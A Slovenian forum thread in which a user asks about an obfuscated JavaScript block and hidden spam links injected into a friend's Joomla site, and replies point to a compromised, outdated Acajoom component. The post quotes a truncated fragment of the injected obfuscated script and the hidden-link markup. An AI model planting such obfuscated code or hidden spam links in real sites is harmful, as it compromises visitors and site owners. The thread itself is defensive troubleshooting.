vprašanja debate oglasi
spletni posel
spletni posel paypal crm facebook dhl affiliate programi instagram
več ...
spletne strani
spletne strani cms html pdf wordpress less sass
več ...
splošne debate
splošne debate računalniki
programiranje
programiranje jquery php python postgresql ms sql mysql
več ...
spletni strežniki
spletni strežniki robots.txt domene dns spam .htaccess mod_rewrite
več ...
Značke Menu
spletni posel spletne strani splošne debate programiranje spletni strežniki
Išči
Nova tema
Vprašanje Debata Oglas
Prijava Registracija

Sumljiv javascript in sumljiv modul v joomli

4 naročniki

Danes me je prijatelj prosil, da mu dodam nekaj novic na njegovo joomla stran.. stran se videl prvič in sem zato malo pogledal kodo.. v head sekciji me je zbodla v oči neka čudna "javascript" koda..

<SCRIPT type="text/javascript">
<!-- $=~[];$={__:++$,$$$$:(![]+"")[$],$:++$,$$:(![]+"")[$],$:++$,$$$:({}+"")[$],$$$:($[$]+"")[$],$$:++$,$$$:(!""+"")[$],$:++$,$$:++$,$$:({}+"")[$],$$_:++$,$$$:++$,$:++$,$$:++$};$.$=($.$=$+"")[$.$$]+($.$=$.$[$.$])+($.$$=($.$+"")[$.$])+((!$)+"")[$.$$]+($.=$.$[$.$$])+($.$=(!""+"")[$.$])+($.=(!""+"")[$.$])+$.$[$.$$]+$.+$.$+$.$;$.$$=$.$+(!""+"")[$.$$]+$.+$.+$.$+$.$$;$.$=($.)[$.$][$.$];$.$($.$($.$$+"\""+" \"+$.$+$.$$+$.+$.$$+"\"+$.$+$.$+$.$$$+$.$$$+""+(![]+"")[$.$]+"\"+$.$+$.$$+$.$+"\"+$.$+$.$$+$.$$+"\"+$.$+$.$$+$.$$+"\"+$.$+$.$$+$.$$+" \"+$.$$$+$.$$+" []\"+$.$$$+$.$$+"\"+$.$+$.$_+"
............. koda je dolga vsaj še 5x toliko..

Kdo ve kaj bi to lahko bilo? Sem že googlal vendar brez uspeha...

potem sem pa še tik pred </body> tagom opazil ene 25 linkov, ki pa se jih na strani ne vidi saj so "skriti" (position:absolute;top:-10000px;left:-10000px;)

Zgleda pa koda takole:
<a href="/modules/com_acajoom/baby-photos-of-brad-pitt-p-222.html" title="baby photos of brad pitt">baby photos of brad pitt</a> | <a href="/modules/com_acajoom/my-jacket-band-p-769.html" title="my jacket band">my jacket band</a> | <a href="/modules/com_acajoom/china-fireworks-factory-p-2208.html" title="china fireworks factory">china fireworks factory</a> | <a href="/modules/com_acajoom/wallpaper-mobile-free-download-p-1112.html" title="wallpaper mobile free download">wallpaper mobile free download</a> | ...

Ker sem bolj pristaš WPja z joomlo nisem veliko delal.. vendar vidim, da gre za nek modul ali komponento acajoom, ki je bila "heknjena"..?

Vsaka pomoč dobrodošla, ker z g. Googlom še nisva našla nič.. :)

699
javascript spletne strani joomla

6 odgovorov

Zgleda kot shekana Joomla.

tudi meni se tako zdi.. :)
če kodo in acajoom pobrišem bo ok?

Acajoom je bil v preteklosti ranljiv na SQL Injection.
Katero verzijo ima kolega?

Mogoče je acajoom z warez strani ;-)

1

acajoom mislim, da je verzija 1.6.25.. Kolikor mi je googl znal povedat se acajoom uporablja za newsletter, ki ga ta stran sploh ne uporablja.. ko pa odprem eno izmed omenjenih skritih povezav v footerju pa mi odpre nek FileSearch Engine..

če je acajoom z warez strani ne vem.. kolikor sem gledal ni (nikjer v fajlih se nihče ne hvali - nulled by XX...)..

1.6.25 je precej stara verzija. Če pa se komponenta sploh ne uporablja, pa ni dileme, stran z njo.